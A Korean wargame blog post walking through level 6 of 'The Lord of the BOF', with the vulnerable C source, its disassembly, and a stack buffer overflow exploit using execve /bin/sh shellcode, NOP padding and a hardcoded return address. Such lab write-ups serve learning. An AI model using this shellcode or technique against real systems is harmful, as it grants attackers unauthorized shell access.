-
lvl 06 wolfman -> darkelfWargame/HackerSchool The Load of the BOF Redhat 2019. 3. 11. 09:13
→ 소스코드는 아래와 같다.
1 /*
2 The Lord of the BOF : The Fellowship of the BOF
3 - darkelf
4 - egghunter + buffer hunter + check length of argv[1]
5 */
6
7 #include <stdio.h>
8 #include <stdlib.h>
9
10 extern char **environ;
11
12 main(int argc, char *argv[])
13 {
14 char buffer[40];
15 int i;
16
17 if(argc < 2){
18 printf("argv error\n");
19 exit(0);
20 }
21
22 // egghunter
23 for(i=0; environ[i]; i++)
24 memset(environ[i], 0, strlen(environ[i]));
25
26 if(argv[1][47] != '\xbf')
27 {
28 printf("stack is still your friend.\n");
29 exit(0);
30 }
31
32 // check the length of argument
33 if(strlen(argv[1]) > 48){
34 printf("argument is too long!\n");
35 exit(0);
36 }
37
38 strcpy(buffer, argv[1]);
39 printf("%s\n", buffer);
40
41 // buffer hunter
42 memset(buffer, 0, 40);
43 }
→ 어셈블리 코드는 아래와 같다.
0x8048500
0x8048501
0x8048503
0x8048506
0x804850a
0x804850c
0x8048511
0x8048516
0x8048519
0x804851b
0x8048520
0x8048523
0x8048524
0x804852b
0x804852c
0x8048530
0x8048533
0x804853a
0x804853f
0x8048543
0x8048545
0x8048547
0x804854a
0x8048551
0x8048556
0x8048559
0x804855a
0x804855f
0x8048562
0x8048564
0x8048565
0x8048567
0x804856a
0x8048571
0x8048576
0x8048579
0x804857a
0x804857f
0x8048582
0x8048585
0x8048587
0x804858a
0x804858d
0x804858f
0x8048592
0x8048595
0x8048597
0x804859c
0x80485a1
0x80485a4
0x80485a6
0x80485ab
0x80485ae
0x80485b0
0x80485b3
0x80485b6
0x80485b8
0x80485b9
0x80485be
0x80485c1
0x80485c3
0x80485c6
0x80485c8
0x80485cd
0x80485d2
0x80485d5
0x80485d7
0x80485dc
0x80485df
0x80485e0
0x80485e3
0x80485e6
0x80485e8
0x80485e9
0x80485ec
0x80485ed
0x80485f2
0x80485f5
0x80485f8
0x80485f9
0x80485fe
0x8048603
0x8048606
0x8048608
0x804860a
0x804860d
0x804860e
0x8048613
0x8048616
0x8048617
<main>
<main+1>
<main+3>
<main+6>
<main+10>
<main+12>
<main+17>
<main+22>
<main+25>
<main+27>
<main+32>
<main+35>
<main+36>
<main+43>
<main+44>
<main+48>
<main+51>
<main+58>
<main+63>
<main+67>
<main+69>
<main+71>
<main+74>
<main+81>
<main+86>
<main+89>
<main+90>
<main+95>
<main+98>
<main+100>
<main+101>
<main+103>
<main+106>
<main+113>
<main+118>
<main+121>
<main+122>
<main+127>
<main+130>
<main+133>
<main+135>
<main+138>
<main+141>
<main+143>
<main+146>
<main+149>
<main+151>
<main+156>
<main+161>
<main+164>
<main+166>
<main+171>
<main+174>
<main+176>
<main+179>
<main+182>
<main+184>
<main+185>
<main+190>
<main+193>
<main+195>
<main+198>
<main+200>
<main+205>
<main+210>
<main+213>
<main+215>
<main+220>
<main+223>
<main+224>
<main+227>
<main+230>
<main+232>
<main+233>
<main+236>
<main+237>
<main+242>
<main+245>
<main+248>
<main+249>
<main+254>
<main+259>
<main+262>
<main+264>
<main+266>
<main+269>
<main+270>
<main+275>
<main+278>
<main+279>
push %ebp
mov %ebp,%esp
sub %esp,44
cmp DWORD PTR [%ebp+8],1
jg 0x8048523 <main+35>
push 0x8048670
call 0x8048410 <printf>
add %esp,4
push 0
call 0x8048420 <exit>
add %esp,4
nop
mov DWORD PTR [%ebp-44],0x0
nop
lea %esi,[%esi*1]
mov %eax,DWORD PTR [%ebp-44]
lea %edx,[%eax*4]
mov %eax,%ds:0x80497a4
cmp DWORD PTR [%eax+%edx],0
jne 0x8048547 <main+71>
jmp 0x8048587 <main+135>
mov %eax,DWORD PTR [%ebp-44]
lea %edx,[%eax*4]
mov %eax,%ds:0x80497a4
mov %edx,DWORD PTR [%eax+%edx]
push %edx
call 0x80483f0 <strlen>
add %esp,4
mov %eax,%eax
push %eax
push 0
mov %eax,DWORD PTR [%ebp-44]
lea %edx,[%eax*4]
mov %eax,%ds:0x80497a4
mov %edx,DWORD PTR [%eax+%edx]
push %edx
call 0x8048430 <memset>
add %esp,12
inc DWORD PTR [%ebp-44]
jmp 0x8048530 <main+48>
mov %eax,DWORD PTR [%ebp+12]
add %eax,4
mov %edx,DWORD PTR [%eax]
add %edx,47
cmp BYTE PTR [%edx],0xbf
je 0x80485b0 <main+176>
push 0x804867c
call 0x8048410 <printf>
add %esp,4
push 0
call 0x8048420 <exit>
add %esp,4
mov %esi,%esi
mov %eax,DWORD PTR [%ebp+12]
add %eax,4
mov %edx,DWORD PTR [%eax]
push %edx
call 0x80483f0 <strlen>
add %esp,4
mov %eax,%eax
cmp %eax,48
jbe 0x80485e0 <main+224>
push 0x8048699
call 0x8048410 <printf>
add %esp,4
push 0
call 0x8048420 <exit>
add %esp,4
nop
mov %eax,DWORD PTR [%ebp+12]
add %eax,4
mov %edx,DWORD PTR [%eax]
push %edx
lea %eax,[%ebp-40]
push %eax
call 0x8048440 <strcpy>
add %esp,8
lea %eax,[%ebp-40]
push %eax
push 0x80486b0
call 0x8048410 <printf>
add %esp,8
push 40
push 0
lea %eax,[%ebp-40]
push %eax
call 0x8048430 <memset>
add %esp,12
leave
ret
→ 5번 문제와 크게 다르지 않다. argv[1] 인자의 크기를 48바이트 넘지 않도록 체크하는 로직이 추가되었다. 따라서, 5번 문제와 동일하게 풀면 된다. 스택의 구조는 아래와 같다.
→ 그리고 argv[1]의 주소를 알아내기 위해, 아래와 같은 소스 코드를 추가한다.
printf("[%#x]\n",argv[1]); // 추가된 소스 argv[1] 주소값 출력
→ 알아낸 주소를 바탕으로 다음과 같은 공격을 수행한다. (페이로드는 5번 문제와 동일)
./wolfmaa $(python -c 'print "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"+"\x90"*20+"\x2b\xfc\xff\xbf"')
→ 결과는 아래와 같다.
'Wargame > HackerSchool The Load of the BOF Redhat' 카테고리의 다른 글
lvl 07 darkelf ->arge (0) 2019.03.14 lvl 05 orc -> wolfman (0) 2019.03.11 lvl 04 goblin -> orc (0) 2019.03.08 lvl 03 cobolt -> goblin (0) 2019.01.22 lvl 02 gremlin -> cobolt (0) 2019.01.13 댓글
